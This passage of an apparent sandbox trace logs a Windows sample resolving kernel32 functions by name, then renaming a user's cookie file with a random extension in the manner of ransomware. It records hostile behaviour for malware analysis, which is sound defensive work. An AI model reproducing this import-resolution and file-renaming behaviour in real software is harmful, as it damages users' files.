(lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.325] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.325] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.326] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.326] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.326] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.326] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.326] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.326] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.326] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.326] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.326] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.326] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.326] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.326] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.326] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.326] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.326] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.326] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.326] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.326] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.326] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.327] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.327] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.327] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.327] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.327] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.327] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.327] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.327] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.327] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.327] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.327] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.327] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.327] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.327] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.327] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.327] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.327] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.327] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.328] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.328] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.328] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.328] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.328] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.328] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.328] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.328] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.328] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.328] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.328] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.328] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.328] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.328] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.328] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.328] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.328] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.328] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.328] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.329] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.329] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.329] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.329] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.329] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.329] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.329] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.329] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.329] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.329] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.329] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.329] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.329] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.329] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.329] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.329] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.329] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.329] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.329] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.330] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.330] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.330] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.330] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.330] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.330] lstrlenA (lpString="DELETEATOM") returned 10 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.330] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.330] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.330] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.330] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.330] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.330] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.330] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.330] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.330] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.330] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.330] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.330] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.330] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.331] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.331] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.331] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.331] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.331] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.331] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.331] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.331] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.331] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.331] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.331] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.331] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.331] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.331] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.331] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.331] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.331] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.331] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.331] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.332] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.332] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.332] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.332] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.332] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.332] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.332] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.332] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.332] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.332] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.332] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.332] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.332] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.332] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.332] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.332] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.332] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.332] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.332] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.332] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.332] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.332] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.332] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt") returned 109 [0079.332] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1") returned 115 [0079.332] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.ysxu1"), dwFlags=0x0) returned 1 [0079.333] VirtualFree (lpAddress=0xfc0000, 